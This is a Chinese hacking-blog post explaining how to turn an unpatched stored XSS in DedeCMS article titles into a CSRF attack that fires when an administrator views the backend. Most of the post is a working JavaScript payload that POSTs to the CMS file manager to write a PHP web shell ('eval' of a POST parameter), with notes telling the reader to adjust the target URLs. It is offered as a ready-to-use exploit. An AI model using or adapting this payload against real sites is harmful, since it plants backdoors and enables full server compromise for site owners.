记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

dedecms利用xss+csrf getshell

2013-06-03 22:15


dedecms的漏洞很多,但是厂商都是不做修复。
之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。
xss1

后台可触发xss
xss2

利用js代码

01var request = false;
02if(window.XMLHttpRequest) {
03request = new XMLHttpRequest();
04if(request.overrideMimeType) {
05request.overrideMimeType('text/xml');
06}
07} else if(window.ActiveXObject) {
08var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
09for(var i=0; i<versions.length; i++) {
10try {
11request = new ActiveXObject(versions[i]);
12} catch(e) {}
13}
14}
15xmlhttp=request;
16 
17getshell();
18function getshell(){
19 
20var postStr="fmdo=edit&backurl=&activepath=%2Fdedecmsfullnew%2Fuploads%2Fuploads&filename=paxmac.php&str=%3C%3Fphp+eval%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E&B1=++%B1%A3+%B4%E6++";//url需要自己修改
21 
22xmlhttp.open("POST", "http://paxmac/dedecmsfullnew/uploads/dede/file_manage_control.php", true);//url需要自己修改
23xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
24xmlhttp.setRequestHeader("Content-length", postStr.length);
25xmlhttp.setRequestHeader("Connection", "close");
26xmlhttp.send(postStr);
27}

 

xss3

触发前
触发前

触发后
触发后

知识来源: www.hackqing.com/index.asp?FoxNews=948.html

阅读:89709 | 评论:0 | 标签:xss CSRF cms

想收藏或者和大家分享这篇好文章→复制链接地址

“dedecms利用xss+csrf getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云